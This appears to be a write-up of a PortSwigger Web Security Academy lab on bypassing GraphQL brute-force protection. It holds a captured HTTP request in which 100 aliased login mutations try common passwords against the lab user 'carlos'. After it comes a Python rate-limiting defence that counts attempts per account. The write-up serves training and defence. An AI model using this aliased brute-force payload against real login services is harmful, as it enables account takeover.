Write-Ups

Lab: Bypassing GraphQL brute force protections

https://portswigger.net/web-security/learning-paths/graphql-api-vulnerabilities/bypassing-rate-limiting-using-aliases/graphql/lab-graphql-brute-force-protection-bypass#

POST /graphql/v1 HTTP/2
Host: 0a48001a03c43ee78174cf0700dd00d6.web-security-academy.net
Cookie: session=VY0gW6oKONZboo6T5OkWHOXEhIq6pfM0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a48001a03c43ee78174cf0700dd00d6.web-security-academy.net/login
Content-Type: application/json
Content-Length: 12998
Origin: https://0a48001a03c43ee78174cf0700dd00d6.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Dnt: 1
Sec-Gpc: 1
Priority: u=0
Te: trailers

{"query":"\n    mutation login{\n\r\nbruteforce0:login(input:{password: \"123456\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce1:login(input:{password: \"password\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce2:login(input:{password: \"12345678\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce3:login(input:{password: \"qwerty\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce4:login(input:{password: \"123456789\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce5:login(input:{password: \"12345\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce6:login(input:{password: \"1234\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce7:login(input:{password: \"111111\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce8:login(input:{password: \"1234567\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce9:login(input:{password: \"dragon\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce10:login(input:{password: \"123123\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce11:login(input:{password: \"baseball\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce12:login(input:{password: \"abc123\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce13:login(input:{password: \"football\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce14:login(input:{password: \"monkey\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    
}\r\n\r\n\r\nbruteforce15:login(input:{password: \"letmein\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce16:login(input:{password: \"shadow\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce17:login(input:{password: \"master\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce18:login(input:{password: \"666666\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce19:login(input:{password: \"qwertyuiop\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce20:login(input:{password: \"123321\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce21:login(input:{password: \"mustang\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce22:login(input:{password: \"1234567890\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce23:login(input:{password: \"michael\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce24:login(input:{password: \"654321\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce25:login(input:{password: \"superman\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce26:login(input:{password: \"1qaz2wsx\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce27:login(input:{password: \"7777777\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce28:login(input:{password: \"121212\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce29:login(input:{password: \"000000\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce30:login(input:{password: 
\"qazwsx\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce31:login(input:{password: \"123qwe\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce32:login(input:{password: \"killer\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce33:login(input:{password: \"trustno1\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce34:login(input:{password: \"jordan\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce35:login(input:{password: \"jennifer\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce36:login(input:{password: \"zxcvbnm\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce37:login(input:{password: \"asdfgh\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce38:login(input:{password: \"hunter\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce39:login(input:{password: \"buster\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce40:login(input:{password: \"soccer\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce41:login(input:{password: \"harley\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce42:login(input:{password: \"batman\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce43:login(input:{password: \"andrew\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce44:login(input:{password: \"tigger\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce45:login(input:{password: \"sunshine\", username: \"carlos\"}) {\r\n        token\r\n 
       success\r\n    }\r\n\r\n\r\nbruteforce46:login(input:{password: \"iloveyou\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce47:login(input:{password: \"2000\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce48:login(input:{password: \"charlie\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce49:login(input:{password: \"robert\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce50:login(input:{password: \"thomas\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce51:login(input:{password: \"hockey\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce52:login(input:{password: \"ranger\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce53:login(input:{password: \"daniel\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce54:login(input:{password: \"starwars\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce55:login(input:{password: \"klaster\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce56:login(input:{password: \"112233\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce57:login(input:{password: \"george\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce58:login(input:{password: \"computer\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce59:login(input:{password: \"michelle\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce60:login(input:{password: \"jessica\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    
}\r\n\r\n\r\nbruteforce61:login(input:{password: \"pepper\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce62:login(input:{password: \"1111\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce63:login(input:{password: \"zxcvbn\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce64:login(input:{password: \"555555\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce65:login(input:{password: \"11111111\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce66:login(input:{password: \"131313\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce67:login(input:{password: \"freedom\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce68:login(input:{password: \"777777\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce69:login(input:{password: \"pass\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce70:login(input:{password: \"maggie\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce71:login(input:{password: \"159753\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce72:login(input:{password: \"aaaaaa\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce73:login(input:{password: \"ginger\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce74:login(input:{password: \"princess\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce75:login(input:{password: \"joshua\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce76:login(input:{password: \"cheese\", 
username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce77:login(input:{password: \"amanda\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce78:login(input:{password: \"summer\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce79:login(input:{password: \"love\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce80:login(input:{password: \"ashley\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce81:login(input:{password: \"nicole\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce82:login(input:{password: \"chelsea\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce83:login(input:{password: \"biteme\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce84:login(input:{password: \"matthew\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce85:login(input:{password: \"access\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce86:login(input:{password: \"yankees\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce87:login(input:{password: \"987654321\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce88:login(input:{password: \"dallas\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce89:login(input:{password: \"austin\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce90:login(input:{password: \"thunder\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce91:login(input:{password: \"taylor\", username: \"carlos\"}) {\r\n        token\r\n        
success\r\n    }\r\n\r\n\r\nbruteforce92:login(input:{password: \"matrix\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce93:login(input:{password: \"mobilemail\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce94:login(input:{password: \"mom\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce95:login(input:{password: \"monitor\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce96:login(input:{password: \"monitoring\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce97:login(input:{password: \"montana\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce98:login(input:{password: \"moon\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n\r\n\r\nbruteforce99:login(input:{password: \"moscow\", username: \"carlos\"}) {\r\n        token\r\n        success\r\n    }\r\n}","operationName":"login"}
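The defender's counterpart to the request above, added here as an example and not part of the original write-up: the lab's rate limit counts HTTP requests, so one document carrying a hundred aliased `login` selections costs a single request. The fix is to budget attempts per account inside the GraphQL document itself. The `login_attempts` scanner, the `LoginLimiter` class and the two-alias sample body are constructed for illustration; the scanner skips string literals so a password value containing `login(` is not miscounted, and the operation name in `mutation login {` is ignored because no `(` follows it.

```python
import json
import re
from collections import Counter
_LOGIN_AT = re.compile(r"login\s*\(")                     # a login field, aliased or bare
_USERNAME = re.compile(r'\busername\s*:\s*"((?:\\.|[^"\\])*)"')

def _skip_string(s: str, i: int) -> int:
    """Return the index just past the string literal that opens at s[i]."""
    i += 1
    while i < len(s) and s[i] != '"':
        i += 2 if s[i] == "\\" else 1                     # honour escaped characters
    return i + 1

def login_attempts(query: str) -> list:
    """Username of every login selection in a GraphQL document, aliased or not."""
    users, i = [], 0
    while i < len(query):
        prev_is_name = i > 0 and (query[i - 1].isalnum() or query[i - 1] == "_")
        if query[i] == '"':                               # a password holding 'login(' is data
            i = _skip_string(query, i)
        elif not prev_is_name and (m := _LOGIN_AT.match(query, i)):
            j, depth = m.end(), 1                         # find the ')' closing the arguments
            while j < len(query) and depth:
                if query[j] == '"':
                    j = _skip_string(query, j)
                    continue
                depth += (query[j] == "(") - (query[j] == ")")
                j += 1
            um = _USERNAME.search(query[m.end():j - 1])
            users.append(um.group(1) if um else "<unknown>")
            i = j
        else:                                             # 'mutation login {' has no '(' and is skipped
            i += 1
    return users

class LoginLimiter:
    """Budgets login attempts per account rather than per HTTP request."""
    def __init__(self, max_attempts: int = 3):
        self.max_attempts = max_attempts
        self.attempts = Counter()

    def admit(self, body: str) -> bool:
        """True if the request may run; an over-budget document is rejected whole."""
        pending = Counter(login_attempts(json.loads(body).get("query", "")))
        if any(self.attempts[u] + n > self.max_attempts for u, n in pending.items()):
            return False
        self.attempts.update(pending)
        return True

# Constructed sample shaped like the lab request: two aliased logins, one password containing 'login('.
SAMPLE_QUERY = """mutation login {
  bruteforce0:login(input:{password: "123456", username: "carlos"}) { token success }
  bruteforce1:login(input:{password: "login(", username: "carlos"}) { token success }
}"""
SAMPLE_BODY = json.dumps({"query": SAMPLE_QUERY, "operationName": "login"})
```

With a budget of three attempts per account, the sample document is admitted once and rejected on the second submission, and a later single-login request for the same account is admitted only while the budget remains.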

Last updated 3 months ago
